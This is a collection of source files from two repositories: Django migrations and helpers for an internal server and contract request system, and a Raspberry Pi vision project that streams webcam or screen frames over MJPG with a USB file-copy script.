"length_bytes": 1456,
"license_type": "no_license",
"max_line_length": 232,
"num_lines": 33,
"path": "/apps/application/migrations/0001_initial.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-15 10:32\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='RootApplication',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('user', models.CharField(max_length=50, verbose_name='\\u7533\\u8bf7\\u4eba')),\n ('ip', models.CharField(max_length=50, verbose_name='\\u7533\\u8bf7ip')),\n ('reason', models.CharField(blank=True, default='', max_length=500, verbose_name='\\u7533\\u8bf7\\u539f\\u56e0')),\n ('status', models.CharField(choices=[('applying', '\\u7533\\u8bf7\\u4e2d'), ('using', '\\u4f7f\\u7528\\u4e2d'), ('done', '\\u5df2\\u56de\\u6536')], default='applying', max_length=20, verbose_name='\\u7533\\u8bf7\\u72b6\\u6001')),\n ('applyTime', models.DateTimeField(default=datetime.datetime.now, verbose_name='\\u7533\\u8bf7\\u65f6\\u95f4')),\n ('deadline', models.CharField(max_length=20, verbose_name='\\u622a\\u6b62\\u65e5\\u671f')),\n ],\n options={\n 'verbose_name': 'root\\u6743\\u9650\\u7533\\u8bf7',\n 'verbose_name_plural': 'root\\u6743\\u9650\\u7533\\u8bf7',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5737704634666443,
"alphanum_fraction": 0.6229507923126221,
"avg_line_length": 21.18181800842285,
"blob_id": "e7073e7e71b09b6ddbda5a67bb05fd0f3c247bde",
"content_id": "147e6166c3aa13faf5a8d002b6d459e739220bcb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 244,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 11,
"path": "/apps/administrator/forms.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/4/28 11:08'\n\nfrom django import forms\nfrom .models import Script\n\nclass ModelFormWithFileField(forms.ModelForm):\n class Meta:\n model = Script\n fields = '__all__'\n"
},
{
"alpha_fraction": 0.4928571283817291,
"alphanum_fraction": 0.5882652997970581,
"avg_line_length": 46.80487823486328,
"blob_id": "d7a759a9ad008f50ba5d04d3e1387924ecbb46e2",
"content_id": "21926ad7af5e3fe3c15f5f36790e2fda60c4fd05",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1960,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 41,
"path": "/apps/application/migrations/0007_auto_20170228_1103.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-28 11:03\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0006_auto_20170224_1017'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='ServerApplication',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('user', models.CharField(max_length=20, verbose_name='\\u4f7f\\u7528\\u4eba')),\n ('username', models.CharField(max_length=200, verbose_name='\\u7528\\u6237\\u540d')),\n ('ip', models.CharField(max_length=20, verbose_name='IP')),\n ('source', models.CharField(max_length=50, verbose_name='\\u6765\\u6e90')),\n ('environment', models.CharField(max_length=50, verbose_name='\\u73af\\u5883\\u7c7b\\u522b')),\n ('os', models.CharField(max_length=20, verbose_name='\\u64cd\\u4f5c\\u7cfb\\u7edf')),\n ('deadline', models.DateTimeField(verbose_name='\\u622a\\u6b62\\u65e5\\u671f')),\n ('reason', models.CharField(max_length=500, verbose_name='\\u7533\\u8bf7\\u539f\\u56e0')),\n ('email', models.EmailField(max_length=100, verbose_name='\\u8054\\u7cfb\\u90ae\\u7bb1')),\n ('appId', models.CharField(max_length=200, verbose_name='\\u7533\\u8bf7id')),\n ('orderId', models.CharField(max_length=200, verbose_name='\\u8ba2\\u5355id')),\n ],\n options={\n 'verbose_name': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7',\n 'verbose_name_plural': '\\u670d\\u52a1\\u5668\\u7533\\u8bf7',\n },\n ),\n migrations.AlterField(\n model_name='rootapplication',\n name='email',\n field=models.EmailField(max_length=100, verbose_name='\\u8054\\u7cfb\\u90ae\\u7bb1'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.6393805146217346,
"alphanum_fraction": 0.6659291982650757,
"avg_line_length": 24.11111068725586,
"blob_id": "ab2f88b00df4eb74894b8e458c88b3bf6c7ba3c9",
"content_id": "7a6df62244436f7e96aaff8286d3a7a8a16c119c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 452,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 18,
"path": "/apps/users/serializers.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/14 22:07'\n\nfrom rest_framework import serializers\n\nfrom .models import UserProfile\n\nclass UserLoginSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = UserProfile\n fields = ('id','email','password')\n\nclass UserProfileSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserProfile\n fields = ('id','nick_name','team','username')\n"
},
{
"alpha_fraction": 0.7688171863555908,
"alphanum_fraction": 0.7688171863555908,
"avg_line_length": 36.29999923706055,
"blob_id": "cd5faa371bc93acdc2435e9b640ed584d056e2d5",
"content_id": "b1f4d307c6568666682542b144a4894c702a66a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 372,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 10,
"path": "/media/scripts/2017/04/receive_xoA7jQU.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "import pika\nconnection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue=\"hello\")\n\ndef callback(ch,method,properties,body):\n\tprint(\"[x] Received %r\" % body)\nchannel.basic_consume(callback,queue=\"hello\",no_ack=True)\nprint(' [*] Waiting for messages. To exit press CTRL+C')\nchannel.start_consuming()"
},
{
"alpha_fraction": 0.5262237787246704,
"alphanum_fraction": 0.618881106376648,
"avg_line_length": 25,
"blob_id": "3019d4de2276573bf66a9a266c312df9e44760d5",
"content_id": "a1a3435797fb33bee31cbe86891bf8b19bc51899",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 22,
"path": "/apps/application/migrations/0005_rootapplication_email.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-22 14:25\nfrom __future__ import unicode_literals\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0004_auto_20170220_1102'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='rootapplication',\n name='email',\n field=models.EmailField(default=datetime.datetime(2017, 2, 22, 14, 25, 15, 271000), max_length=100),\n preserve_default=False,\n ),\n ]\n"
},
{
"alpha_fraction": 0.49696969985961914,
"alphanum_fraction": 0.5927272439002991,
"avg_line_length": 46.14285659790039,
"blob_id": "f1bd6d152c5a72c41d45b0d1ea6f9df13b4ae255",
"content_id": "08172724dbbacf2496d8cab09fdb6b25c037d6c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1650,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 35,
"path": "/apps/contractBudget/migrations/0008_paymentrecord.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-31 17:08\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0007_paymentplan'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='PaymentRecord',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('contractId', models.CharField(max_length=50, verbose_name='\\u5408\\u540c\\u7f16\\u53f7')),\n ('numOfPayments', models.IntegerField(verbose_name='\\u4ed8\\u6b3e\\u7b14\\u6570')),\n ('billNum', models.CharField(max_length=50, verbose_name='\\u62a5\\u8d26\\u5355\\u53f7')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u603b\\u8d39\\u7528')),\n ('billTime', models.CharField(max_length=50, verbose_name='\\u62a5\\u8d26\\u65f6\\u95f4')),\n ('processTime', models.CharField(max_length=50, verbose_name='\\u5ba1\\u6279\\u65f6\\u95f4')),\n ],\n options={\n 'ordering': ('processTime',),\n 'verbose_name': '\\u4ed8\\u6b3e\\u8bb0\\u5f55',\n 'verbose_name_plural': '\\u4ed8\\u6b3e\\u8bb0\\u5f55',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.49821215867996216,
"alphanum_fraction": 0.6126340627670288,
"avg_line_length": 58.92856979370117,
"blob_id": "63f0c8033acb0b95b9fb826f2c97a78ab7d581d7",
"content_id": "0fc1d54486beb8003d6f838c3ea0663fa3d5614c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2517,
"license_type": "no_license",
"max_line_length": 238,
"num_lines": 42,
"path": "/apps/contractBudget/migrations/0005_contract.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-29 17:01\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0004_supplier'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Contract',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('contractId', models.CharField(max_length=100, unique=True, verbose_name='\\u5408\\u540c\\u7f16\\u53f7')),\n ('lawId', models.CharField(blank=True, max_length=100, verbose_name='\\u5f8b\\u5ba1\\u7f16\\u53f7')),\n ('status', models.CharField(choices=[('\\u6267\\u884c\\u4e2d', '\\u6267\\u884c\\u4e2d'), ('\\u6267\\u884c\\u5b8c', '\\u6267\\u884c\\u5b8c'), ('\\u5df2\\u79fb\\u4ea4', '\\u5df2\\u79fb\\u4ea4')], default='\\u6267\\u884c\\u4e2d', max_length=10)),\n ('supplierId', models.CharField(max_length=100, verbose_name='\\u4e59\\u65b9\\u7f16\\u53f7')),\n ('accountName', models.CharField(max_length=50, verbose_name='\\u4e59\\u65b9\\u8d26\\u6237\\u540d\\u79f0')),\n ('bankMaster', models.CharField(max_length=50, verbose_name='\\u4e59\\u65b9\\u5f00\\u6237\\u884c')),\n ('investment', models.FloatField(default=0, verbose_name='\\u6295\\u8d44\\u8d39\\u7528')),\n ('maintain', models.FloatField(default=0, verbose_name='\\u7ef4\\u4fdd\\u8d39\\u7528')),\n ('development', models.FloatField(default=0, verbose_name='\\u7814\\u53d1\\u8d39\\u7528')),\n ('total', models.FloatField(default=0, verbose_name='\\u603b\\u8d39\\u7528')),\n ('signDate', models.DateTimeField(verbose_name='\\u7b7e\\u7f72\\u65f6\\u95f4')),\n ('subscriber', models.CharField(max_length=20, verbose_name='\\u7b7e\\u7f72\\u4eba')),\n ('handlerPerson', models.CharField(max_length=50, verbose_name='\\u5408\\u540c\\u7ecf\\u529e\\u4eba')),\n ('comment', models.CharField(max_length=200, verbose_name='\\u5408\\u540c\\u5185\\u5bb9')),\n ('project', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='contractBudget.Project', verbose_name='\\u6240\\u5c5e\\u9879\\u76ee')),\n ],\n options={\n 'ordering': ('signDate',),\n 'verbose_name': '\\u5408\\u540c',\n 'verbose_name_plural': '\\u5408\\u540c',\n },\n ),\n ]\n"
},
{
"alpha_fraction": 0.5311827659606934,
"alphanum_fraction": 0.5956989526748657,
"avg_line_length": 22.25,
"blob_id": "0775083c749087648d603fbd729b3caeacac5ce9",
"content_id": "0075b83e9277bb8c02f147f2653dc0166444b30e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 465,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 20,
"path": "/apps/application/migrations/0015_order_user.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-08 19:02\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0014_merge'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='order',\n name='user',\n field=models.CharField(default='\\u5434\\u5efa\\u519b', max_length=200),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5708661675453186,
"alphanum_fraction": 0.625984251499176,
"avg_line_length": 24.399999618530273,
"blob_id": "0f3dd888df96cc5216992a7e0d2125a90e18915b",
"content_id": "6f69980b1041195da828da83bcf405f8b6e91857",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 508,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 20,
"path": "/apps/application/migrations/0012_auto_20170302_1422.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-02 14:22\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0011_remove_serverapplication_appid'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='serverapplication',\n name='orderId',\n field=models.CharField(max_length=200, verbose_name='\\u8ba2\\u5355id'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5469387769699097,
"alphanum_fraction": 0.6122449040412903,
"avg_line_length": 23.5,
"blob_id": "515d0c8734ae0a298e705b6c9eebec720bacb152",
"content_id": "ed285b221ba25050654a0f1b3237a7e71d222fdb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 490,
"license_type": "no_license",
"max_line_length": 91,
"num_lines": 20,
"path": "/apps/contractBudget/migrations/0006_auto_20170330_1331.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-30 13:31\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('contractBudget', '0005_contract'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='contract',\n name='signDate',\n field=models.CharField(max_length=50, verbose_name='\\u7b7e\\u7f72\\u65f6\\u95f4'),\n ),\n ]\n"
},
{
"alpha_fraction": 0.4463955760002136,
"alphanum_fraction": 0.5286506414413452,
"avg_line_length": 35.06666564941406,
"blob_id": "3c23bdfa12e376657c682c8dff8f44e670d4de68",
"content_id": "a9457c804f5bc12c4fb9847c80e9ca554ca1a792",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1082,
"license_type": "no_license",
"max_line_length": 164,
"num_lines": 30,
"path": "/apps/application/migrations/0017_auto_20170321_1719.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-21 17:19\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0016_auto_20170315_1350'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='serverapplication',\n name='cpu',\n field=models.CharField(choices=[('1C', '1C'), ('2C', '2C'), ('4C', '4C'), ('8C', '8C'), ('16C', '16C'), ('32C', '32C')], default='1C', max_length=10),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='memory',\n field=models.CharField(choices=[('2G', '2G'), ('4G', '4G'), ('8G', '8G'), ('16G', '16G'), ('32G', '32G'), ('64G', '64G')], default='2G', max_length=10),\n ),\n migrations.AddField(\n model_name='serverapplication',\n name='store',\n field=models.CharField(choices=[('20G', '20G'), ('40G', '40G'), ('100G', '100G')], default='20G', max_length=10),\n ),\n ]\n"
},
{
"alpha_fraction": 0.5242424011230469,
"alphanum_fraction": 0.6303030252456665,
"avg_line_length": 19.625,
"blob_id": "63a7785a4137f052b99301cc0e5418292c4ebf8e",
"content_id": "abc7a5f7be409df751431547b8eb1092a667b643",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 330,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 16,
"path": "/apps/application/migrations/0019_merge.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-03-22 10:08\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('application', '0017_auto_20170321_1719'),\n ('application', '0018_merge'),\n ]\n\n operations = [\n ]\n"
},
{
"alpha_fraction": 0.6887966990470886,
"alphanum_fraction": 0.7136929631233215,
"avg_line_length": 31.200000762939453,
"blob_id": "251ec96bdab04558b75dfb58da82b05b0ab1abbd",
"content_id": "ca48cdf81bd7ebae5005f09a9527f231eeffde89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 482,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 15,
"path": "/extra_apps/xadmin/plugins/excel.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'Clarence'\n__date__ = '2017/2/11 20:00'\n\nimport xadmin\nfrom xadmin.views import BaseAdminPlugin, ListAdminView\nfrom django.template import loader\n\nclass ListImportExcelPlugin(BaseAdminPlugin):\n import_excel = True\n\n def init_request(self, *args, **kwargs):\n return bool(self.import_excel)\n def block_top_toolbar(self,context,nodes):\n nodes.append(loader.render_to_string('xadmin/excel/model_list.top_toolbar.import.html'))"
},
{
"alpha_fraction": 0.5051652789115906,
"alphanum_fraction": 0.5630165338516235,
"avg_line_length": 31.266666412353516,
"blob_id": "8cfee053d0531e0c7a9e5216da3a74d386108a35",
"content_id": "5a38de00103b973a068bbc9d66a448d032770fd4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 968,
"license_type": "no_license",
"max_line_length": 116,
"num_lines": 30,
"path": "/apps/serverApplication/migrations/0005_auto_20170227_1554.py",
"repo_name": "up-x-men/ssp-api",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9 on 2017-02-27 15:54\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('serverApplication', '0004_os'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Environment',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('name', models.CharField(max_length=30, verbose_name='\\u73af\\u5883\\u7c7b\\u522b')),\n ],\n options={\n 'verbose_name': '\\u64cd\\u4f5c\\u7cfb\\u7edf',\n 'verbose_name_plural': '\\u64cd\\u4f5c\\u7cfb\\u7edf',\n },\n ),\n migrations.AlterModelOptions(\n name='os',\n options={'verbose_name': '\\u64cd\\u4f5c\\u7cfb\\u7edf', 'verbose_name_plural': '\\u64cd\\u4f5c\\u7cfb\\u7edf'},\n ),\n ]\n"
}
] | 64 |
1777TheVikings/Pi2017 | https://github.com/1777TheVikings/Pi2017 | 82a63be33a007e25fcf662875afbcac096505c79 | 7f986eed645a3fa7936f5443f428c2ffad577c2f | e1f46e716fc2715563b47fa9e2673a21340adcab | refs/heads/main | 2021-09-04T12:51:14.720412 | 2018-01-18T21:57:48 | 2018-01-18T21:57:48 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6618704795837402,
"alphanum_fraction": 0.6744604110717773,
"avg_line_length": 19.592592239379883,
"blob_id": "c5cb8dfadf51b0b363c4e18e3edbde6323a1bcde",
"content_id": "9899382ffaa2b85a33b2781695379cc53293f02b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 27,
"path": "/src/vision_utils/stream_webcam_test.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "# import numpy as np\nimport vision_utils\nimport cv2\nimport threading\n\nstop = False\n\nserver_mjpg = vision_utils.MJPG(None, threading.Lock())\nserver = vision_utils.MJPGserver(server_mjpg)\n\n# noinspection PyArgumentList\ncap = cv2.VideoCapture(0)\nrval, _ = cap.read()\n\nserver.start()\n\ntry:\n while rval:\n rval, frame = cap.read()\n\n frame = cv2.flip(frame, 1)\n\n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\nexcept KeyboardInterrupt:\n server.stop()\n"
},
{
"alpha_fraction": 0.5978552103042603,
"alphanum_fraction": 0.6764968633651733,
"avg_line_length": 30.08333396911621,
"blob_id": "76d96d5bc73fe2e8849da99be4c08720af59e84a",
"content_id": "878c027a0a8bdff7974a54f2df78c918bd94de5e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1119,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 36,
"path": "/src/vision_utils/stream_screen_test.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from PIL import ImageGrab\nimport numpy as np\nimport vision_utils\nimport cv2\nimport threading\n\nstop = False\n\nserver_mjpg = vision_utils.MJPG(None, threading.Lock())\nserver = vision_utils.MJPGserver(server_mjpg)\n\n# noinspection PyArgumentList\ncap = cv2.VideoCapture(0)\nrval, _ = cap.read()\n\nserver.start()\n\nx_offset = 1366 - 320 - 25\ny_offset = 786 - 180 - 25\n\nwhile rval:\n rval, frame_webcam = cap.read() # 720x1280 for MacBook webcam\n frame_webcam = cv2.resize(frame_webcam, (0, 0), fx=0.25, fy=0.25) # 180x320 after resize\n\n frame = np.array(ImageGrab.grab(bbox=(0, 0, 1365, 785))) # 1366x786 for MacBook display\n frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\n\n cv2.putText(frame, \"Viewer Count: \" + str(vision_utils.VIEWER_COUNT), (50, 50), cv2.FONT_HERSHEY_SIMPLEX, 2,\n (255, 255, 255))\n frame[y_offset:y_offset + frame_webcam.shape[0], x_offset:x_offset + frame_webcam.shape[1]] = frame_webcam\n\n frame = cv2.resize(frame, (0, 0), fx=0.5, fy=0.5)\n\n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\n"
},
{
"alpha_fraction": 0.7796609997749329,
"alphanum_fraction": 0.7796609997749329,
"avg_line_length": 58,
"blob_id": "32ff271274744750a6163b9564c534a2e0c01eff",
"content_id": "fe9932fbc0a40584fcfdd967e3c30105c3451562",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 59,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 1,
"path": "/src/README.txt",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "led_thread.py does not work and will lock up the terminal.\n"
},
{
"alpha_fraction": 0.800000011920929,
"alphanum_fraction": 0.800000011920929,
"avg_line_length": 26,
"blob_id": "c149cd1270a332d7bea23bf23f807a401c63abad",
"content_id": "6bc6eaeaec1ddfcaf1e103d082792e7024183177",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 80,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 3,
"path": "/src/vision_utils/__init__.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from vision_utils import *\nfrom benchmarking import *\nfrom contour_info import *"
},
{
"alpha_fraction": 0.7543859481811523,
"alphanum_fraction": 0.7631579041481018,
"avg_line_length": 113,
"blob_id": "9d2ba561e6ae936a430e21e8b4c3ddb9e5a58f45",
"content_id": "1143c64437e52127bf4e8066a7ed744c7dcc599d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 114,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 1,
"path": "/rec/README.txt",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "In order to save space, 'last.mp4' is overwritten for each recording. If you want to save a recording, rename it.\n"
},
{
"alpha_fraction": 0.5806655883789062,
"alphanum_fraction": 0.58795565366745,
"avg_line_length": 27.423423767089844,
"blob_id": "8344beda66b797918761a54b623db585862819a9",
"content_id": "b9768fe59ba278492659b6644e899a174e03425a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3155,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 111,
"path": "/src/vision_utils/vision_utils.py",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "from bottle import get, response, ServerAdapter\nfrom bottle import run as run_server\nimport threading\n\n\nBOUNDARY = \"okthxbby\"\nCRLF = \"\\r\\n\"\nFRAME_MJPG = None\nVIEWER_COUNT = 0\nALL_STREAMS = []\nSTOP_STREAMS = False\n\n\nclass MJPG(object):\n def __init__(self, frame, lock):\n self.frame = frame\n self.lock = lock\n\n\nclass MJPGstream(object):\n def __init__(self, frame_mjpg, width, height):\n global VIEWER_COUNT\n self.frame_mjpg = frame_mjpg\n self.stream_width = width\n self.stream_height = height\n VIEWER_COUNT += 1\n\n def __iter__(self):\n global ALL_STREAMS\n ALL_STREAMS.append(self)\n return self\n\n def next(self):\n if STOP_STREAMS:\n raise StopIteration\n self.frame_mjpg.lock.acquire()\n data = self.frame_mjpg.frame\n self.frame_mjpg.lock.release()\n\n # Add the frame boundary to the output\n out = \"--\" + BOUNDARY + CRLF\n\n # Add the jpg frame header\n out += \"Content-type: image/jpeg\" + CRLF\n\n # Add the frame content length\n out += \"Content-length: \" + str(len(data)) + CRLF + CRLF\n\n # Add the actual binary jpeg frame data\n return out + data\n\n def stop(self):\n global VIEWER_COUNT\n global ALL_STREAMS\n VIEWER_COUNT -= 1\n ALL_STREAMS.remove(self)\n\n def send_frame(self, frame):\n frame_width, frame_height, _ = frame.shape\n stream_frame = cv2.resize(frame,\n None,\n fx=frame_width / stream_width,\n fy=frame_height / stream_height,\n interpolation=cv2.INTER_CUBIC)\n \n server_mjpg.lock.acquire()\n server_mjpg.frame = cv2.imencode(\".jpg\", frame)[1].tostring()\n server_mjpg.lock.release()\n\n\n# found at https://stackoverflow.com/questions/11282218/bottle-web-framework-how-to-stop\nclass WSGIRefServerStoppable(ServerAdapter):\n server = None\n\n def run(self, handler):\n from wsgiref.simple_server import make_server, WSGIRequestHandler\n if self.quiet:\n class QuietHandler(WSGIRequestHandler):\n def log_request(*args, **kw): pass\n self.options['handler_class'] = QuietHandler\n self.server = make_server(self.host, self.port, handler, **self.options)\n self.server.serve_forever()\n\n def stop(self):\n STOP_STREAMS = True\n self.server.shutdown()\n\n\nclass MJPGserver(threading.Thread):\n def __init__(self, frame_mjpg):\n global FRAME_MJPG\n super(MJPGserver, self).__init__()\n FRAME_MJPG = frame_mjpg\n self.server = WSGIRefServerStoppable(host=\"0.0.0.0\", port=8080)\n\n def run(self):\n run_server(server=self.server, debug=True)\n\n def stop(self):\n self.server.stop()\n\n @staticmethod\n @get(\"/\")\n def index():\n return '<html><body><img src=\"/mjpeg\" /></body></html>'\n\n @staticmethod\n @get(\"/mjpg\")\n def mjpeg():\n response.content_type = \"multipart/x-mixed-replace;boundary=\" + BOUNDARY\n return iter(MJPGstream(FRAME_MJPG))\n"
},
{
"alpha_fraction": 0.7119565010070801,
"alphanum_fraction": 0.760869562625885,
"avg_line_length": 29.66666603088379,
"blob_id": "00ad765084aa54c33bb071e1c693c845e59e1943",
"content_id": "4a289e50f52fc388757c9f432eea78901c93e9a3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 70,
"num_lines": 6,
"path": "/utils/usb_transfer.sh",
"repo_name": "1777TheVikings/Pi2017",
"src_encoding": "UTF-8",
"text": "mount /dev/sda1/ /media/usb\n\ncp /media/usb/vision_files/pipeline.py /home/pi/Pi2017/src/pipeline.py\ncp /home/pi/Pi2017/rec/last.avi /media/usb/vision_files/last.avi\n\numount /media/usb\n"
},
{
"alpha_fraction": 0.7541666626930237,
"alphanum_fraction": 0.7708333134651184,
"avg_line_length": 47,
"blob_id": "155f6233bbfcc397499a41058c1d9cfd1a0e04fa",
"content_id": "d693d7324437537014c0a6fd475b5e4ddb9a265b",
